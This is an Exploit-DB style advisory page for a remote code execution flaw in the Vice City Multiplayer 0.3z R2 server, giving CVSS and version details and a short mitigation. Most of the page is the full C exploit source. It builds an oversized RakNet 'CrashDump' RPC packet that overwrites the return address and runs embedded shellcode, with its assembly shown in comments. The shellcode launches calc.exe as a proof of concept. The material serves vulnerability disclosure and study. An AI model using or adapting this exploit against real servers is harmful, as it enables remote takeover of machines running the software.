Vice City Multiplayer remote code execution (Server)

vendor:

Vice City Multiplayer

by:

Sasuke78200 (Benjaa Toufik)

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Vice City Multiplayer

Affected Version From: 0.3z R2

Affected Version To: 0.3z R2

Patch Exists: YES

Related CWE: N/A

CPE: a:vice_city_multiplayer:vice_city_multiplayer:0.3z_r2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003, Windows Server 2008

2012

Vice City Multiplayer remote code execution (Server)

This exploit allows a remote attacker to execute arbitrary code on a vulnerable server running Vice City Multiplayer. The exploit is triggered by sending a specially crafted packet to the server. The packet contains a buffer of 0x49 bytes followed by a pointer to the shellcode and the shellcode itself. The shellcode executes the calc.exe program.

Mitigation:

Update to the latest version of Vice City Multiplayer server.

Source

Exploit-DB raw data:

/*
Exploit Title: Vice City Multiplayer remote code execution (Server)
Date: 22/08/2012
Exploit Author: Sasuke78200 (Benjaa Toufik)
Software Link:
http://www.vicecitymultiplayer.com/downloads/03z_r2/server0.3zr2(pawn)(win)(updated2).zip
Version: 0.3z R2
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
Windows Server 2008, it should work on all Windows.

Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20758.tar.gz
*/

#include "main.h"

/* 
	Written by Sasuke78200
	http://sasuke78200.blogspot.fr/

 */


RakClientInterface* pClientInterface;


void Exploit()
{
	unsigned long iLen;
	unsigned char aBuffer[4096];
	RakNet::BitStream* pBitStream;

	unsigned char aShellCode[] = 
	{
		0xE8, 0x25, 0x00, 0x00, 0x00, 0x5B, 0x81, 0xEC, 
		0x80, 0x00, 0x00, 0x00, 0x6A, 0x01, 0x6A, 0x00,
		0x6A, 0x00, 0x53, 0x68, 0x78, 0x82, 0x44, 0x00, 
		0x6A, 0x00, 0xB8, 0x94, 0x61, 0x44, 0x00, 0xFF, 
		0x10, 0x6A, 0x00, 0xB8, 0x00, 0x61, 0x44, 0x00, 
		0xFF, 0x10, 0xE8, 0xD6, 0xFF, 0xFF, 0xFF, 0x63, 
		0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00
/* Compiled version of */
		//USE32
	
		//_start:
		//	call _string

		//_begin:
		//	pop 	ebx
		//	sub 	esp, 0x80

		//	; ShellExecuteA(0, "open", "calc.exe", 0, 0, SW_SHOWNORMAL);
		//	push	1
		//	push	0
		//	push 	0
		//	push	ebx
		//	push	0x448278	; offset of "open" on the server
		//	push	0x00
		//	mov		eax, 0x446194
		//	call	[eax]

		//	; ExitProcess(0); To avoid a crash
		//	push	0
		//	mov		eax, 0x446100
		//	call	[eax]
	
		//_string:
		//	call _begin
		//	db "calc.exe"
		//	db 0
	};

	pBitStream = new RakNet::BitStream();

	memset(aBuffer, 0x49, sizeof(aBuffer));

	iLen = 588; // limit of the stack on Windows

	// New EIP (stack pointer)

	*(unsigned long*)&aBuffer[iLen] = 0x4165E6;		// Windows
	iLen += 4; // EIP
	*(unsigned long*)&aBuffer[iLen] = 0x90909090;
	iLen += 4;
	memcpy(&aBuffer[iLen], aShellCode, sizeof(aShellCode));
	iLen += sizeof(aShellCode);



	pBitStream->Write((unsigned int)iLen);
	pBitStream->Write((char*)aBuffer, iLen);


	pClientInterface->RPC("CrashDump", pBitStream, HIGH_PRIORITY, RELIABLE, 0, false, UNASSIGNED_NETWORK_ID, 0);
	delete pBitStream;
}

int main()
{

	Packet*	pPacket;

	pClientInterface = RakNetworkFactory::GetRakClientInterface();
	pClientInterface->Connect("127.0.0.1", 5192, 0, 0, 20);


	for(;;)
	{
		while((pPacket = pClientInterface->Receive()) != 0)
		{
			switch(pPacket->data[0])
			{
			case ID_CONNECTION_REQUEST_ACCEPTED:
				{
					puts("Connected ...");
					Exploit();
					break;
				}
			case ID_CONNECTION_LOST:
				{
					puts("Connection time out\nCode executed ? :)");
					break;
				}
			case ID_RECEIVED_STATIC_DATA:
				{
					break;
				}
			default:
				{
					printf("packet id %d received lenght %d bytes\n", pPacket->data[0], pPacket->length);
				}
			}

			pClientInterface->DeallocatePacket(pPacket);
		}


	}

	return 0;
}